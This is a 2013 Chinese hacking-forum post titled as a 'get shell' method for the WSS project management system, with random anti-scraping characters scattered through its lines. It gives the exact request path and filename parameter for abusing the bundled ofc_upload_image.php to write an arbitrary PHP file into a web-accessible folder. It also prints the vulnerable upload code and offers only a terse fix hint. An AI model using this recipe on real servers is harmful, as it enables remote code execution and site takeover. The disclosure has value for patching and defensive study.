找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2120|回复: 0
打印 上一主题 下一主题

WSS项目管理系统Post get shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 12:38:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
POST 数据漏洞文件执行任意后缀文件保存
6 D# p3 ?; X  v2 [( g; w8 ` 漏洞文件/chart/php-ofc-library/ofc_upload_image.php& v# `: ]% ]( h  N* [
7 r1 V6 r0 J- e
利用:' s2 L/ j8 o' b2 C" N
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
& m7 z! R0 j, o% W. H+ w$ t& W
' m6 m! ]* Y3 n" W9 H$ y2 n$ g& rPost任意数据
9 b# A- L3 K6 M- N# N4 q$ F保存位置http://localhost/chart/tmp-upload-images/hfy.php
' ^) o/ A; S( H9 U+ f+ m% q" v8 s' P3 F

9 r' h1 e: u! l+ L& {最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~6 j, j. M% `: ^7 o6 i9 p

! a5 d! r3 e% V! H1 ]6 T<?php
# u" l. @! f4 K$ V, @' J2 P" }7 D3 m/ Z' X* `6 U7 i6 r
//1 R  T; V4 s+ p9 b; f( t
// In Open Flash Chart -> save_image debug mode, you) r$ }7 }6 l3 z) I
// will see the 'echo' text in a new window.
4 ^4 B. f5 U6 h9 e. s//
5 D1 ~  {9 Y! A+ ~" N& @' Y0 C& O% k: N% S- g
/*
- A9 N4 @9 k8 K5 G% D4 p6 ^, X( a8 t3 k, F- P! t7 m" M# A3 M4 r
print_r( $_GET );
9 g1 D/ @4 E) T" \print_r( $_POST );' c, `6 K6 \& S
print_r( $_FILES );6 \) T2 m% s! n$ R) T+ e
$ E& r+ ?7 B# z! I( A
print_r( $GLOBALS );2 J/ }% C5 |9 j7 Q$ @
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
7 B4 h$ d  R: ?
# B# z; W5 U* [1 f*/
1 C- m# U* V3 z# m// default path for the image to be stored //9 c' P  a" ?6 p) e
$default_path = '../tmp-upload-images/';
, R5 a2 i; e' h- ]' G' @0 t
2 v6 Q$ v$ X6 a1 cif (!file_exists($default_path)) mkdir($default_path, 0777, true);& a" Q, }  Y! o1 q1 M
8 p; h$ c4 w, U- q" Y
// full path to the saved image including filename //
6 c* H7 F: T4 m- y6 G6 f$destination = $default_path . basename( $_GET[ 'name' ] );
0 b1 d7 `7 j& B5 J1 r& X  f6 V
1 A5 ]0 w1 b  c' q. \8 Wecho 'Saving your image to: '. $destination;/ S& T/ N1 n: ~; Q& ^4 {; u
// print_r( $_POST );
+ w9 _0 ^6 a, _. E, \: v" f5 N% ~// print_r( $_SERVER );2 E! _: A0 b& j: K8 V9 z( v; ^
// echo $HTTP_RAW_POST_DATA;1 R# X3 n* t4 F. M. d# l

% I( W6 |( ?5 m4 `# \* o- ?  G  k//$ z$ R1 R; Y0 e
// POST data is usually string data, but we are passing a RAW .png
! c$ \( M* w$ @7 U// so PHP is a bit confused and $_POST is empty. But it has saved7 W9 p  y1 @1 {- Z: I
// the raw bits into $HTTP_RAW_POST_DATA. l4 M/ p7 ^. a& E4 {5 b2 r
//
/ _: F* }4 t- R
  {4 D0 K2 o% {/ x) l  G$jfh = fopen($destination, 'w') or die("can't open file");
0 G! y9 u. U. v1 I: P6 O8 yfwrite($jfh, $HTTP_RAW_POST_DATA);+ W5 e+ A3 H* T& E
fclose($jfh);8 o( C$ @: g3 C  K7 Z. ?! M

) C& g) T) ]  I4 b( v" Z//+ m0 _4 y( R! F
// LOOK:$ @0 p9 U5 Q; a( L( |1 U; K4 W
//% W3 P0 K' n! z3 P: C
exit();; U. h5 ], M1 S9 _  `( }
//
6 Q0 `1 D+ M+ F// PHP5:0 ]. K, `0 M( o9 o' e5 _6 Z% c
//, \+ H; {3 g' L- h7 K

) ~6 P2 R/ S1 N  C0 q6 n7 M: @" r8 `( v8 C& g) }5 |, S2 |8 A
// default path for the image to be stored //& P& S/ ~9 i+ j; A3 C3 L* D6 e" C
$default_path = 'tmp-upload-images/';
1 R- \- l8 R/ N6 E2 u+ O
/ D7 Z3 p8 ?1 t/ uif (!file_exists($default_path)) mkdir($default_path, 0777, true);
4 e8 |) |9 ?9 F  ^& C8 T% Q# G2 b
6 s$ E9 \4 l# k8 u9 i+ ^// full path to the saved image including filename //
( k7 T/ r) c  [6 ^. j& Z4 `$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
6 {- S! Q8 B: L& v* w! D" Z/ g1 S; r; r( q: s; Z4 V- z
// move the image into the specified directory //% ^, Y; t, q- I$ Y5 Y
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {+ Y6 g3 H% w3 b8 S& o
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
+ `* @: ?, N5 C} else {; b0 @. f4 [  }
    echo "FILE UPLOAD FAILED";
, n( b: S9 ]% Q1 t7 W/ Q4 j}
/ g7 v9 z; ^+ E# G+ O7 j
! H0 Z' }8 [! [5 ?. z8 [
% ~; I# @) [$ W3 a3 Q  h?>
, v6 G8 n- E! Z2 S. m" j, b
& t1 F7 y" u) r6 s+ _# L$ G) g. I5 s- F
/ ?& W  {. x9 m  B- Q% T

* W) H) ~4 P: z! ]# [) \( i, z* ]) @, W. v* m1 b3 [1 ?# S* w
" {. {% a) x2 d: W. t% {
修复方案:
' l6 T* V! }1 y7 L7 c/ [  A7 s( p3 z这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
- G% U4 d4 t: f' T, @
& M5 o4 [$ h0 H4 l% a2 H( \& h* s' k7 w4 C" Z" M- u
! T  W6 s+ g0 b, t+ X7 ?
& {0 s, n; q/ \6 @4 y( ?

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表